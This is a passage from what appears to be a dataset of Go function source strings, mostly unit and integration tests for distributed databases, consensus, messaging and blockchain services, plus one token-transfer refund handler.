opts...)\n\t\t\t}\n\t\t},\n\t}\n\tctx := context.Background()\n\tvar seen int64\n\ttc := testcluster.StartTestCluster(t, 2, base.TestClusterArgs{\n\t\tServerArgs: base.TestServerArgs{\n\t\t\tKnobs: base.TestingKnobs{\n\t\t\t\tServer: &server.TestingKnobs{\n\t\t\t\t\tContextTestingKnobs: rpcKnobs,\n\t\t\t\t},\n\t\t\t\tRangeFeed: &rangefeed.TestingKnobs{\n\t\t\t\t\tOnRangefeedRestart: func() {\n\t\t\t\t\t\tatomic.AddInt64(&seen, 1)\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t})\n\tdefer tc.Stopper().Stop(ctx)\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tif n := atomic.LoadInt64(&seen); n < timesToFail {\n\t\t\treturn errors.Errorf(\"seen %d, waiting for %d\", n, timesToFail)\n\t\t}\n\t\treturn nil\n\t})\n}", "func TestCannotTransferLeaseToVoterOutgoing(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tknobs, ltk := makeReplicationTestKnobs()\n\t// Add a testing knob to allow us to block the change replicas command\n\t// while it is being proposed. When we detect that the change replicas\n\t// command to move n3 to VOTER_OUTGOING has been evaluated, we'll send\n\t// the request to transfer the lease to n3. The hope is that it will\n\t// get past the sanity above latch acquisition prior to change replicas\n\t// command committing.\n\tvar scratchRangeID atomic.Value\n\tscratchRangeID.Store(roachpb.RangeID(0))\n\tchangeReplicasChan := make(chan chan struct{}, 1)\n\tshouldBlock := func(args kvserverbase.ProposalFilterArgs) bool {\n\t\t// Block if a ChangeReplicas command is removing a node from our range.\n\t\treturn args.Req.RangeID == scratchRangeID.Load().(roachpb.RangeID) &&\n\t\t\targs.Cmd.ReplicatedEvalResult.ChangeReplicas != nil &&\n\t\t\tlen(args.Cmd.ReplicatedEvalResult.ChangeReplicas.Removed()) > 0\n\t}\n\tblockIfShould := func(args kvserverbase.ProposalFilterArgs) {\n\t\tif shouldBlock(args) {\n\t\t\tch := make(chan struct{})\n\t\t\tchangeReplicasChan <- ch\n\t\t\t<-ch\n\t\t}\n\t}\n\tknobs.Store.(*kvserver.StoreTestingKnobs).TestingProposalFilter = func(args kvserverbase.ProposalFilterArgs) *roachpb.Error {\n\t\tblockIfShould(args)\n\t\treturn nil\n\t}\n\ttc := testcluster.StartTestCluster(t, 4, base.TestClusterArgs{\n\t\tServerArgs: base.TestServerArgs{Knobs: knobs},\n\t\tReplicationMode: base.ReplicationManual,\n\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tscratchStartKey := tc.ScratchRange(t)\n\tdesc := tc.AddVotersOrFatal(t, scratchStartKey, tc.Targets(1, 2)...)\n\tscratchRangeID.Store(desc.RangeID)\n\t// Make sure n1 has the lease to start with.\n\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\tscratchStartKey, tc.Target(0).StoreID)\n\trequire.NoError(t, err)\n\n\t// The test proceeds as follows:\n\t//\n\t// - Send an AdminChangeReplicasRequest to remove n3 and add n4\n\t// - Block the step that moves n3 to VOTER_OUTGOING on changeReplicasChan\n\t// - Send an AdminLeaseTransfer to make n3 the leaseholder\n\t// - Try really hard to make sure that the lease transfer at least gets to\n\t// latch acquisition before unblocking the ChangeReplicas.\n\t// - Unblock the ChangeReplicas.\n\t// - Make sure the lease transfer fails.\n\n\tltk.withStopAfterJointConfig(func() {\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\t_, err = tc.Server(0).DB().AdminChangeReplicas(ctx,\n\t\t\t\tscratchStartKey, desc, []roachpb.ReplicationChange{\n\t\t\t\t\t{ChangeType: roachpb.REMOVE_VOTER, Target: tc.Target(2)},\n\t\t\t\t\t{ChangeType: roachpb.ADD_VOTER, Target: tc.Target(3)},\n\t\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t}()\n\t\tch := <-changeReplicasChan\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\t\t\tscratchStartKey, tc.Target(2).StoreID)\n\t\t\trequire.Error(t, err)\n\t\t\trequire.Regexp(t,\n\t\t\t\t// The error generated during evaluation.\n\t\t\t\t\"replica cannot hold lease|\"+\n\t\t\t\t\t// If the lease transfer request has not yet made it to the latching\n\t\t\t\t\t// phase by the time we close(ch) below, we can receive the following\n\t\t\t\t\t// error due to the sanity checking which happens in\n\t\t\t\t\t// AdminTransferLease before attempting to evaluate the lease\n\t\t\t\t\t// transfer.\n\t\t\t\t\t// We have a sleep loop below to try to encourage the lease transfer\n\t\t\t\t\t// to make it past that sanity check prior to letting the change\n\t\t\t\t\t// of replicas proceed.\n\t\t\t\t\t\"cannot transfer lease to replica of type VOTER_DEMOTING_LEARNER\", err.Error())\n\t\t}()\n\t\t// Try really hard to make sure that our request makes it past the\n\t\t// sanity check error to the evaluation error.\n\t\tfor i := 0; i < 100; i++ {\n\t\t\truntime.Gosched()\n\t\t\ttime.Sleep(time.Microsecond)\n\t\t}\n\t\tclose(ch)\n\t\twg.Wait()\n\t})\n\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func respondTransferReject(ctx context.Context, masterDB *db.DB,\r\n\tholdingsChannel *holdings.CacheChannel, config *node.Config, w *node.ResponseWriter,\r\n\ttransferTx *inspector.Transaction, transfer *actions.Transfer, rk *wallet.Key, code uint32,\r\n\tstarted bool, text string) error {\r\n\r\n\tv := ctx.Value(node.KeyValues).(*node.Values)\r\n\r\n\t// Determine UTXOs to fund the reject response.\r\n\tutxos, err := transferTx.UTXOs().ForAddress(rk.Address)\r\n\tif err != nil {\r\n\t\treturn errors.Wrap(err, \"Transfer UTXOs not found\")\r\n\t}\r\n\r\n\t// Remove boomerang from funding UTXOs since it was already spent.\r\n\tif started {\r\n\t\t// Remove utxo spent by boomerang\r\n\t\tboomerangIndex := findBoomerangIndex(transferTx, transfer, rk.Address)\r\n\t\tif boomerangIndex != 0xffffffff && transferTx.Outputs[boomerangIndex].Address.Equal(rk.Address) {\r\n\t\t\tfound := false\r\n\t\t\tfor i, utxo := range utxos {\r\n\t\t\t\tif utxo.Index == boomerangIndex {\r\n\t\t\t\t\tfound = true\r\n\t\t\t\t\tutxos = append(utxos[:i], utxos[i+1:]...) // Remove\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif !found {\r\n\t\t\t\treturn errors.New(\"Boomerang output not found\")\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tbalance := uint64(0)\r\n\tfor _, utxo := range utxos {\r\n\t\tbalance += uint64(utxo.Value)\r\n\t}\r\n\r\n\tupdates := make(map[bitcoin.Hash20]*map[bitcoin.Hash20]*state.Holding)\r\n\r\n\tw.SetRejectUTXOs(ctx, utxos)\r\n\r\n\t// Add refund amounts for all bitcoin senders (if \"first\" contract, first contract receives bitcoin funds to be distributed)\r\n\tfirst := firstContractOutputIndex(transfer.Assets, transferTx)\r\n\tif first == 0xffff {\r\n\t\treturn errors.New(\"First contract output index not found\")\r\n\t}\r\n\r\n\t// Determine if this contract is the first contract and needs to send a refund.\r\n\tif !transferTx.Outputs[first].Address.Equal(rk.Address) {\r\n\t\treturn errors.New(\"This is not the first contract\")\r\n\t}\r\n\r\n\trefundBalance := uint64(0)\r\n\tfor assetOffset, assetTransfer := range transfer.Assets {\r\n\t\tif assetTransfer.AssetType == protocol.BSVAssetID && len(assetTransfer.AssetCode) == 0 {\r\n\t\t\t// Process bitcoin senders refunds\r\n\t\t\tfor _, sender := range assetTransfer.AssetSenders {\r\n\t\t\t\tif int(sender.Index) >= len(transferTx.Inputs) {\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t}\r\n\r\n\t\t\t\tnode.LogVerbose(ctx, \"Bitcoin refund %d : %s\", sender.Quantity,\r\n\t\t\t\t\tbitcoin.NewAddressFromRawAddress(transferTx.Inputs[sender.Index].Address,\r\n\t\t\t\t\t\tw.Config.Net))\r\n\t\t\t\tw.AddRejectValue(ctx, transferTx.Inputs[sender.Index].Address, sender.Quantity)\r\n\t\t\t\trefundBalance += sender.Quantity\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\t// Add all other senders to be notified\r\n\t\t\tfor _, sender := range assetTransfer.AssetSenders {\r\n\t\t\t\tif int(sender.Index) >= len(transferTx.Inputs) {\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t}\r\n\r\n\t\t\t\tw.AddRejectValue(ctx, transferTx.Inputs[sender.Index].Address, 0)\r\n\t\t\t}\r\n\r\n\t\t\tif started { // Revert holding statuses\r\n\t\t\t\tif len(transferTx.Outputs) <= int(assetTransfer.ContractIndex) {\r\n\t\t\t\t\treturn fmt.Errorf(\"Contract index out of range for asset %d\", assetOffset)\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif !transferTx.Outputs[assetTransfer.ContractIndex].Address.Equal(rk.Address) {\r\n\t\t\t\t\tcontinue // This asset is not ours. Skip it.\r\n\t\t\t\t}\r\n\r\n\t\t\t\tassetCode, err := bitcoin.NewHash20(assetTransfer.AssetCode)\r\n\t\t\t\tif err != nil {\r\n\t\t\t\t\treturn errors.Wrap(err, \"invalid asset code\")\r\n\t\t\t\t}\r\n\t\t\t\tupdatedHoldings := make(map[bitcoin.Hash20]*state.Holding)\r\n\t\t\t\tupdates[*assetCode] = &updatedHoldings\r\n\r\n\t\t\t\t// Revert sender pending statuses\r\n\t\t\t\tfor _, sender := range assetTransfer.AssetSenders {\r\n\t\t\t\t\t// Revert holding status\r\n\t\t\t\t\th, err := holdings.GetHolding(ctx, masterDB, rk.Address, assetCode,\r\n\t\t\t\t\t\ttransferTx.Inputs[sender.Index].Address, v.Now)\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"get holding\")\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\thash, err := transferTx.Inputs[sender.Index].Address.Hash()\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"sender address hash\")\r\n\t\t\t\t\t}\r\n\t\t\t\t\tupdatedHoldings[*hash] = h\r\n\r\n\t\t\t\t\t// Revert holding status\r\n\t\t\t\t\terr = holdings.RevertStatus(h, transferTx.Hash)\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"revert status\")\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\t// Revert receiver pending statuses\r\n\t\t\t\tfor _, receiver := range assetTransfer.AssetReceivers {\r\n\t\t\t\t\treceiverAddress, err := bitcoin.DecodeRawAddress(receiver.Address)\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn err\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\th, err := holdings.GetHolding(ctx, masterDB, rk.Address, assetCode,\r\n\t\t\t\t\t\treceiverAddress, v.Now)\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"get holding\")\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\thash, err := receiverAddress.Hash()\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"receiver address hash\")\r\n\t\t\t\t\t}\r\n\t\t\t\t\tupdatedHoldings[*hash] = h\r\n\r\n\t\t\t\t\t// Revert holding status\r\n\t\t\t\t\terr = holdings.RevertStatus(h, transferTx.Hash)\r\n\t\t\t\t\tif err != nil {\r\n\t\t\t\t\t\treturn errors.Wrap(err, \"revert status\")\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tif started {\r\n\t\terr = saveHoldings(ctx, masterDB, holdingsChannel, updates, rk.Address)\r\n\t\tif err != nil {\r\n\t\t\treturn errors.Wrap(err, \"save holdings\")\r\n\t\t}\r\n\t}\r\n\r\n\tif refundBalance > balance {\r\n\t\tct, err := contract.Retrieve(ctx, masterDB, rk.Address, config.IsTest)\r\n\t\tif err != nil {\r\n\t\t\treturn errors.Wrap(err, \"Failed to retrieve contract\")\r\n\t\t}\r\n\r\n\t\t// Funding not enough to refund everyone, so don't refund to anyone. Send it to the\r\n\t\t// administration to hold.\r\n\t\tw.ClearRejectOutputValues(ct.AdminAddress)\r\n\t}\r\n\r\n\treturn node.RespondRejectText(ctx, w, transferTx, rk, code, text)\r\n}", "func (s *PartitionCsmSuite) TestSeveralMessageReties(c *C) {\n\toffsetsBefore := s.kh.GetOldestOffsets(topic)\n\ts.cfg.Consumer.AckTimeout = 100 * time.Millisecond\n\ts.kh.SetOffsetValues(group, topic, offsetsBefore)\n\n\tpc := Spawn(s.ns, group, topic, partition, s.cfg, s.groupMember, s.msgFetcherF, s.offsetMgrF)\n\tdefer pc.Stop()\n\n\t// Read and confirm offered several messages, but do not ack them.\n\tfor i := 0; i < 7; i++ {\n\t\tmsg := <-pc.Messages()\n\t\tsendEvOffered(msg)\n\t}\n\t// Wait for all offers to expire...\n\ttime.Sleep(100 * time.Millisecond)\n\t// ...the first message we read is not a retry and this is ok...\n\tmsg := <-pc.Messages()\n\tsendEvOffered(msg)\n\tc.Assert(msg.Offset, Equals, offsetsBefore[partition]+int64(7))\n\t// ...but following 7 are.\n\tfor i := 0; i < 7; i++ {\n\t\tmsg := <-pc.Messages()\n\t\tsendEvOffered(msg)\n\t\tc.Assert(msg.Offset, Equals, offsetsBefore[partition]+int64(i))\n\t}\n}", "func testDelayedRevokeWithUpdate1() {\n\tst.SetDelay(0.5) // revocation takes longer, but still completes before lease expires\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:6\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\t// put key1, this should block\n\t\treplyP, err := st.Put(key1, \"newnew-value\")\n\t\tif checkErrorStatus(err, replyP.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif !st.comp_revoke[key1] {\n\t\t\tfmt.Fprintln(output, \"FAIL: storage server should hold modification to key x during finishing revocating all lease holders of x\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treplyG, err := st.Get(key1, false)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif replyG.Value != \"newnew-value\" {\n\t\t\tfmt.Fprintln(output, \"FAIL: got wrong value\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func TestRemoveEdgeRevision(t *testing.T) {\n\tvar ctx context.Context\n\tc := createClient(t, nil)\n\tdb := ensureDatabase(ctx, c, \"edge_test\", nil, t)\n\tprefix := \"remove_edge_revision_\"\n\tg := ensureGraph(ctx, db, prefix+\"graph\", nil, t)\n\tec := ensureEdgeCollection(ctx, g, prefix+\"citiesPerState\", []string{prefix + \"city\"}, []string{prefix + \"state\"}, t)\n\tcities := ensureCollection(ctx, db, prefix+\"city\", nil, t)\n\tstates := ensureCollection(ctx, db, prefix+\"state\", nil, t)\n\tfrom := createDocument(ctx, cities, map[string]interface{}{\"name\": \"Venlo\"}, t)\n\tto := createDocument(ctx, states, map[string]interface{}{\"name\": \"Limburg\"}, t)\n\n\tdoc := RouteEdge{\n\t\tFrom: from.ID.String(),\n\t\tTo: to.ID.String(),\n\t\tDistance: 77,\n\t}\n\tmeta, err := ec.CreateDocument(ctx, doc)\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to create new document: %s\", describe(err))\n\t}\n\n\t// Replace the document to get another revision\n\treplacement := RouteEdge{\n\t\tFrom: to.ID.String(),\n\t\tTo: from.ID.String(),\n\t\tDistance: 88,\n\t}\n\tmeta2, err := ec.ReplaceDocument(ctx, meta.Key, replacement)\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to replace document '%s': %s\", meta.Key, describe(err))\n\t}\n\n\t// Try to remove document with initial revision (must fail)\n\tinitialRevCtx := driver.WithRevision(ctx, meta.Rev)\n\tif _, err := ec.RemoveDocument(initialRevCtx, meta.Key); !driver.IsPreconditionFailed(err) {\n\t\tt.Fatalf(\"Expected PreconditionFailedError, got %s\", describe(err))\n\t}\n\n\t// Try to remove document with correct revision (must succeed)\n\treplacedRevCtx := driver.WithRevision(ctx, meta2.Rev)\n\tif _, err := ec.RemoveDocument(replacedRevCtx, meta.Key); err != nil {\n\t\tt.Fatalf(\"Expected success, got %s\", describe(err))\n\t}\n\n\t// Should not longer exist\n\tvar readDoc RouteEdge\n\tif _, err := ec.ReadDocument(ctx, meta.Key, &readDoc); !driver.IsNotFound(err) {\n\t\tt.Fatalf(\"Expected NotFoundError, got %s\", describe(err))\n\t}\n\n\t// Document must not exists now\n\tif found, err := ec.DocumentExists(nil, meta.Key); err != nil {\n\t\tt.Fatalf(\"DocumentExists failed for '%s': %s\", meta.Key, describe(err))\n\t} else if found {\n\t\tt.Errorf(\"DocumentExists returned true for '%s', expected false\", meta.Key)\n\t}\n}", "func SNSSQSMessageDisableDeleteOnRetryLimit(t *testing.T) {\n\tconsumerGroup1 := watcher.NewUnordered()\n\tfailedMessagesNum := 1\n\n\treadyToConsume := atomic.Bool{}\n\tvar task flow.AsyncTask\n\tsetReadyToConsume := func(consumeTimeout time.Duration, _ *watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\ttm := time.After(consumeTimeout * time.Second)\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-task.Done():\n\t\t\t\t\tctx.Log(\"setReadyToConsume - task done called!\")\n\t\t\t\t\treturn nil\n\n\t\t\t\tcase <-tm:\n\t\t\t\t\tctx.Logf(\"setReadyToConsume setting readyToConsume\")\n\t\t\t\t\treadyToConsume.Store(true)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tsubscriberApplication := func(appID string, topicName string, messagesWatcher *watcher.Watcher) app.SetupFn {\n\t\treturn func(ctx flow.Context, s common.Service) error {\n\t\t\treturn multierr.Combine(\n\t\t\t\ts.AddTopicEventHandler(&common.Subscription{\n\t\t\t\t\tPubsubName: pubsubName,\n\t\t\t\t\tTopic: topicName,\n\t\t\t\t\tRoute: \"/orders\",\n\t\t\t\t}, func(_ context.Context, e *common.TopicEvent) (retry bool, err error) {\n\t\t\t\t\tif !readyToConsume.Load() {\n\t\t\t\t\t\tctx.Logf(\"subscriberApplication - Message Received appID: %s,pubsub: %s, topic: %s, id: %s, data: %s - causing failure on purpose...\", appID, e.PubsubName, e.Topic, e.ID, e.Data)\n\t\t\t\t\t\ttime.Sleep(5 * time.Second)\n\t\t\t\t\t\treturn true, fmt.Errorf(\"failure on purpose\")\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmessagesWatcher.Observe(e.Data)\n\t\t\t\t\t\tctx.Logf(\"subscriberApplication - Message Received appID: %s,pubsub: %s, topic: %s, id: %s, data: %s\", appID, e.PubsubName, e.Topic, e.ID, e.Data)\n\t\t\t\t\t\treturn false, nil\n\t\t\t\t\t}\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\t}\n\n\tpublishMessages := func(metadata map[string]string, sidecarName string, topicName string, messageWatchers ...*watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\t// prepare the messages\n\t\t\tmessages := make([]string, failedMessagesNum)\n\t\t\tfor i := range messages {\n\t\t\t\tmessages[i] = fmt.Sprintf(\"partitionKey: %s, message for topic: %s, index: %03d, uniqueId: %s\", metadata[messageKey], topicName, i, uuid.New().String())\n\t\t\t}\n\n\t\t\t// add the messages as expectations to the watchers\n\t\t\tfor _, messageWatcher := range messageWatchers {\n\t\t\t\tmessageWatcher.ExpectStrings(messages...)\n\t\t\t}\n\n\t\t\t// get the sidecar (dapr) client\n\t\t\tclient := sidecar.GetClient(ctx, sidecarName)\n\n\t\t\t// publish messages\n\t\t\tctx.Logf(\"SNSSQSMessageDisableDeleteOnRetryLimit - Publishing messages. sidecarName: %s, topicName: %s\", sidecarName, topicName)\n\n\t\t\tvar publishOptions dapr.PublishEventOption\n\n\t\t\tif metadata != nil {\n\t\t\t\tpublishOptions = dapr.PublishEventWithMetadata(metadata)\n\t\t\t}\n\n\t\t\tfor _, message := range messages {\n\t\t\t\tctx.Logf(\"Publishing: %q\", message)\n\t\t\t\tvar err error\n\n\t\t\t\tif publishOptions != nil {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message, publishOptions)\n\t\t\t\t} else {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message)\n\t\t\t\t}\n\t\t\t\trequire.NoError(ctx, err, \"SNSSQSMessageDisableDeleteOnRetryLimit - error publishing message\")\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tassertMessages := func(timeout time.Duration, messageWatchers ...*watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\t// assert for messages\n\t\t\tfor _, m := range messageWatchers {\n\t\t\t\tif !m.Assert(ctx, 3*timeout) {\n\t\t\t\t\tctx.Errorf(\"SNSSQSMessageDisableDeleteOnRetryLimit - message assertion failed for watcher: %#v\\n\", m)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tprefix := \"SNSSQSMessageDisableDeleteOnRetryLimit-\"\n\tsetReadyToConsumeApp := prefix + \"setReadyToConsumeApp\"\n\tsubApp := prefix + \"subscriberApp\"\n\tsubAppSideCar := prefix + sidecarName2\n\treadyToConsumeTimeout := time.Duration(20) //seconds\n\n\tflow.New(t, \"SNSSQSMessageDisableDeleteOnRetryLimit Verify data with an optional parameters `disableDeleteOnRetryLimit` takes affect\").\n\t\tStepAsync(setReadyToConsumeApp, &task,\n\t\t\tsetReadyToConsume(readyToConsumeTimeout, nil)).\n\n\t\t// Run subscriberApplication - will fail to process messages\n\t\tStep(app.Run(subApp, fmt.Sprintf(\":%d\", appPort+portOffset+4),\n\t\t\tsubscriberApplication(subApp, disableDeleteOnRetryLimitTopicIn, consumerGroup1))).\n\n\t\t// Run the Dapr sidecar with \"PUBSUB_AWS_SNSSQS_TOPIC_NODRT\"\n\t\tStep(sidecar.Run(subAppSideCar,\n\t\t\tappend(componentRuntimeOptions(),\n\t\t\t\tembedded.WithComponentsPath(\"./components/disableDeleteOnRetryLimit\"),\n\t\t\t\tembedded.WithAppProtocol(protocol.HTTPProtocol, strconv.Itoa(appPort+portOffset+4)),\n\t\t\t\tembedded.WithDaprGRPCPort(strconv.Itoa(runtime.DefaultDaprAPIGRPCPort+portOffset+4)),\n\t\t\t\tembedded.WithDaprHTTPPort(strconv.Itoa(runtime.DefaultDaprHTTPPort+portOffset+4)),\n\t\t\t\tembedded.WithProfilePort(strconv.Itoa(runtime.DefaultProfilePort+portOffset+4)),\n\t\t\t)...,\n\t\t)).\n\t\tStep(\"publish messages to disableDeleteOnRetryLimitTopicIn ==> \"+disableDeleteOnRetryLimitTopicIn, publishMessages(nil, subAppSideCar, disableDeleteOnRetryLimitTopicIn, consumerGroup1)).\n\t\tStep(\"wait\", flow.Sleep(30*time.Second)).\n\t\tStep(\"verify if app1 has 0 recevied messages published to active topic\", assertMessages(10*time.Second, consumerGroup1)).\n\t\tStep(\"reset\", flow.Reset(consumerGroup1)).\n\t\tRun()\n}", "func TestAgentFailsRequestWithoutToken(t *testing.T) {\n\tif *skip {\n\t\tt.Skip(\"Test is skipped until Citadel agent is setup in test.\")\n\t}\n\tclient, err := sdsc.NewClient(sdsc.ClientOptions{\n\t\tServerAddress: *sdsUdsPath,\n\t})\n\tif err != nil {\n\t\tt.Errorf(\"failed to create sds client\")\n\t}\n\tclient.Start()\n\tdefer client.Stop()\n\tclient.Send()\n\terrmsg := \"no credential token\"\n\t_, err = client.WaitForUpdate(3 * time.Second)\n\tif err == nil || strings.Contains(err.Error(), errmsg) {\n\t\tt.Errorf(\"got [%v], want error with substring [%v]\", err, errmsg)\n\t}\n}", "func checkNegDescription(t *testing.T, syncer *transactionSyncer, desc string) {\n\texpectedNegDesc := utils.NegDescription{\n\t\tClusterUID: syncer.kubeSystemUID,\n\t\tNamespace: syncer.NegSyncerKey.Namespace,\n\t\tServiceName: syncer.NegSyncerKey.Name,\n\t\tPort: fmt.Sprint(syncer.NegSyncerKey.PortTuple.Port),\n\t}\n\tactualNegDesc, err := utils.NegDescriptionFromString(desc)\n\tif err != nil {\n\t\tt.Errorf(\"Invalid neg description: %s\", err)\n\t}\n\n\tif !reflect.DeepEqual(*actualNegDesc, expectedNegDesc) {\n\t\tt.Errorf(\"Unexpected neg description %s, expected %s\", desc, expectedNegDesc.String())\n\t}\n}", "func requestRandomnessAndAssertRandomWordsRequestedEvent(\n\tt *testing.T,\n\tvrfConsumerHandle vrfConsumerContract,\n\tconsumerOwner *bind.TransactOpts,\n\tkeyHash common.Hash,\n\tsubID uint64,\n\tnumWords uint32,\n\tcbGasLimit uint32,\n\tuni coordinatorV2Universe,\n) (*big.Int, uint64) {\n\tminRequestConfirmations := uint16(2)\n\t_, err := vrfConsumerHandle.TestRequestRandomness(\n\t\tconsumerOwner,\n\t\tkeyHash,\n\t\tsubID,\n\t\tminRequestConfirmations,\n\t\tcbGasLimit,\n\t\tnumWords,\n\t)\n\trequire.NoError(t, err)\n\n\tuni.backend.Commit()\n\n\titer, err := uni.rootContract.FilterRandomWordsRequested(nil, nil, []uint64{subID}, nil)\n\trequire.NoError(t, err, \"could not filter RandomWordsRequested events\")\n\n\tevents := []*vrf_coordinator_v2.VRFCoordinatorV2RandomWordsRequested{}\n\tfor iter.Next() {\n\t\tevents = append(events, iter.Event)\n\t}\n\n\trequestID, err := vrfConsumerHandle.SRequestId(nil)\n\trequire.NoError(t, err)\n\n\tevent := events[len(events)-1]\n\trequire.Equal(t, event.RequestId, requestID, \"request ID in contract does not match request ID in log\")\n\trequire.Equal(t, keyHash.Bytes(), event.KeyHash[:], \"key hash of event (%s) and of request not equal (%s)\", hex.EncodeToString(event.KeyHash[:]), keyHash.String())\n\trequire.Equal(t, cbGasLimit, event.CallbackGasLimit, \"callback gas limit of event and of request not equal\")\n\trequire.Equal(t, minRequestConfirmations, event.MinimumRequestConfirmations, \"min request confirmations of event and of request not equal\")\n\trequire.Equal(t, numWords, event.NumWords, \"num words of event and of request not equal\")\n\n\treturn requestID, event.Raw.BlockNumber\n}", "func TestBlipRevokeNonExistentRole(t *testing.T) {\n\trt := NewRestTester(t,\n\t\t&RestTesterConfig{\n\t\t\tGuestEnabled: false,\n\t\t})\n\tdefer rt.Close()\n\tcollection := rt.GetSingleTestDatabaseCollection()\n\n\tbase.SetUpTestLogging(t, base.LevelTrace, base.KeyAll)\n\n\t// 1. Create user with admin_roles including two roles not previously defined (a1 and a2, for example)\n\tres := rt.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/%s/_user/bilbo\", rt.GetDatabase().Name), GetUserPayload(t, \"bilbo\", \"test\", \"\", collection, []string{\"c1\"}, []string{\"a1\", \"a2\"}))\n\tRequireStatus(t, res, http.StatusCreated)\n\n\t// Create a doc so we have something to replicate\n\tres = rt.SendAdminRequest(http.MethodPut, \"/{{.keyspace}}/testdoc\", `{\"channels\": [\"c1\"]}`)\n\tRequireStatus(t, res, http.StatusCreated)\n\n\t// 3. Update the user to not reference one of the roles (update to ['a1'], for example)\n\t// [also revoke channel c1 so the doc shows up in the revocation queries]\n\tres = rt.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/%s/_user/bilbo\", rt.GetDatabase().Name), GetUserPayload(t, \"bilbo\", \"test\", \"\", collection, []string{}, []string{\"a1\"}))\n\tRequireStatus(t, res, http.StatusOK)\n\n\t// 4. Try to sync\n\tbt, err := NewBlipTesterClientOptsWithRT(t, rt, &BlipTesterClientOpts{\n\t\tUsername: \"bilbo\",\n\t\tSendRevocations: true,\n\t})\n\trequire.NoError(t, err)\n\tdefer bt.Close()\n\n\trequire.NoError(t, bt.StartPull())\n\n\t// in the failing case we'll panic before hitting this\n\tbase.WaitForStat(func() int64 